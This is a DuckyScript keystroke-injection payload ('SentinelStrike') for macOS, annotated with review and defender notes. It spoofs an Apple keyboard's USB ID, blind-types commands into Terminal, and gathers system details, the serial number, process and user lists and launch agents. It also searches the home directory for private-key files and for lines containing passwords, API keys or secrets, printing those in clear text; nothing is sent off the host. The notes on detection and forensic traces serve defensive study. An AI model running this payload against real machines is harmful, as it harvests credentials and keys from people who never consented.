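REM macOS Security Testing and Reconnaissance Duckyscript (Local System)
REM Unveiling the Depths of macOS Security
REM Comprehensive Testing and Advanced Reconnaissance Capabilities
REM This script pulls just about everything you would need to know about a target Mac

REM Author: Narsty
REM Title: SentinelStrike
REM Target: MacOS
REM Version: 1.0
REM Category: RECON

REM Scope: every command below is typed into a visible Terminal window and runs
REM with the privileges of the logged-in user. Output is only echoed to that
REM window; nothing in this script writes results to a file or sends them off
REM the host.

REM Report Apple's USB vendor ID (05ac) and an Apple keyboard product string.
REM Defender note: USB descriptors are self-declared by the device, so an
REM "Apple keyboard" that enumerates mid-session is not proof of real Apple
REM hardware; a new HID device followed by a burst of typing is the signal.
ID 05ac:021e Apple:Keyboard
DELAY 1000

REM Open Spotlight with Cmd+Space and launch Terminal by typing its name.
REM The keystrokes are sent blind: the script cannot confirm that Spotlight or
REM Terminal has focus, so on a locked screen or with a remapped shortcut the
REM text is typed into whatever is in front.
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING clear
ENTER
DELAY 500
STRING echo "Starting local system security testing and reconnaissance..."
ENTER
DELAY 1000
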
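REM Gather System Information
REM Filters system_profiler's hardware and software overview down to the lines
REM whose label matches one of the listed strings, then tries to strip leading
REM whitespace.
REM NOTE(review): the labels are matched literally. A label that does not appear
REM verbatim on a given macOS release or CPU type (check "OS Version" and
REM "Processor Name" against real output) is silently dropped.
REM NOTE(review): \s in the sed expression is not POSIX; [[:space:]] is the
REM portable character class if the trim has no effect.
REM The serial number is an asset identifier; handle captured output accordingly.
STRING echo "----- System Information -----"
ENTER
STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//'
ENTER
DELAY 1000
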
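REM Check for Suspicious Processes
REM Despite the heading, no suspicion analysis is done. This prints the PID and
REM the first word of the command (ps aux columns 2 and 11) for every process
REM line containing the text "root" or "admin" anywhere: owner, path or argument.
REM On a normal system that covers most system daemons, so read the result as a
REM raw process list, not as findings.
REM awk splits on whitespace, so a command path containing spaces is truncated.
STRING echo "----- Suspicious Processes -----"
ENTER
STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}'
ENTER
DELAY 1000
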
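REM List Startup Items
REM Long-lists the system-wide and per-user launchd job directories.
REM Only names, owners and modes are shown; the plists are not parsed, so the
REM listing does not reveal what each job executes.
REM Coverage is limited to these three directories; other launch mechanisms are
REM not inspected.
REM When reviewing the output, check owner and mode: entries in the two /Library
REM directories are expected to be root-owned and not writable by other users.
STRING echo "----- Startup Items -----"
ENTER
STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents
ENTER
DELAY 1000
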
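REM Check User Accounts
REM Lists the user records in the local directory node and hides names that
REM contain an underscore.
REM NOTE(review): grep -v '_' drops every name with an underscore anywhere, not
REM only the "_"-prefixed service accounts, so a regular account such as
REM "jane_doe" (constructed example) would be missing from the audit. Anchoring
REM the pattern as '^_' limits the filter to the prefix.
REM Built-in accounts without the prefix (for example root) still appear.
STRING echo "----- User Accounts -----"
ENTER
STRING dscl . -list /Users | grep -v '_'
ENTER
DELAY 1000
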
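REM Find Sensitive Files
REM Locates regular files under the home directory by extension only
REM (.key, .pem, .rsa, case-insensitive).
REM Names are matched, contents are not read: a hit may be a public certificate
REM rather than a private key, and key material stored under other names is not
REM reported. Treat the list as candidates to review, not as confirmed exposure.
REM 2>/dev/null discards permission errors, so folders the user cannot read are
REM skipped without notice.
STRING echo "----- Sensitive Files -----"
ENTER
STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null
ENTER
DELAY 1000
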
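REM Search for Sensitive Information
REM Recursive, case-insensitive search of text-like files under the home
REM directory for the words password, username, apikey or secret; .git and
REM node_modules directories are skipped.
REM Defender note: grep prints every matching line, so any credential values it
REM finds are copied in clear text into the terminal scrollback. A review that
REM only needs to locate the files can list names with grep -l instead.
REM -I ignores binary files, so the *.doc* and *.xls* patterns presumably
REM contribute little for compressed Office formats (confirm on real data).
REM Reading privacy-protected folders from Terminal can raise a macOS consent
REM prompt or be denied; with 2>/dev/null those denials are invisible and the
REM results may be incomplete.
REM Detection: one grep process reading a large share of the home directory
REM shortly after a new HID device appears is a recognisable pattern in endpoint
REM telemetry.
STRING echo "----- Sensitive Information -----"
ENTER
STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null
ENTER
DELAY 1000
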
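REM Check for Unsecured Files and Directories
REM Finds directories named "public" or "www" (any case) under the home
REM directory. The match is by name only; no permission or sharing check is
REM made, so a hit is not evidence that the folder is exposed.
REM macOS creates a Public folder in each user's home by default, so at least
REM one hit is expected on a clean system.
STRING echo "----- Unsecured Files and Directories -----"
ENTER
STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null
ENTER
DELAY 1000
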
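REM Finished
REM The script ends with the Terminal window still open and all collected
REM output in its scrollback. Forensic note: commands typed into an interactive
REM shell are normally also recorded in the user's shell history.
STRING echo "----- Security testing and reconnaissance completed! -----"
ENTER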